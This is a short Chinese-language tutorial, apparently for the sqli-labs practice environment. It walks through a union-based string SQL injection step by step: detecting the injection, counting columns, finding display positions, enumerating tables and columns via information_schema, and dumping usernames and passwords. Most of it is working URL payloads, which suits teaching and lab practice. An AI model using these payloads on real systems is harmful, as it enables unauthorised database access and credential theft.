1.判断是否存在注入，注入是字符型还是数字型?

?id=1 and 1=1

?id=1 and 1=2

因为输入and 1=1与and 1=2 回显正常，所以该地方不是数字型。

?id=1'

?id=1'--+

输入单引号后报错，在单引号后添加--+恢复正常，说明存在字符注入

2.猜解SQL查询语句中的字段数

?id=1' order by 3 --+

?id=1' order by 4 --+

利用二分法尝试，得到列数为3

3.确定回显位置

将id=1改为一个数据库不存在的id值，如-1，使用union select 1,2,3联合查询语句查看页面是否有显示位。(当union前面语句查询不到时，会使用union后面的查询语句)

?id=-1' union select 1,2,3 --+

发现页面先输出了2和3，说明页面有2个显示位 。

4.获取当前数据库

?id=1' union select 1,database(),version() --+

通过数据库自带函数database()和version()获取数据库名和版本

5.获取数据库中的表

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where  table_schema='security' --+

从information_schema.tables系统表中检索所有属于security数据库的表名，并将它们连接成一个由逗号分隔的字符串。GROUP_CONCAT函数在这里用于将多个表名合并成一个单一的字符串结果。(因为查询出来是按列来排序所以需要GROUP_CONCAT函数来将列合并成一行)

6.获取表中的字段名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where  table_schema='security' and table_name='users' --+

从information_schema.columns系统表中检索特定数据库（security）中特定表（users）的所有列名

7.得到数据

?id=-1' union select 1,2,group_concat(username,0x3a,password) from users --+

0x3a时表示十六进制中的冒号，方便查看信息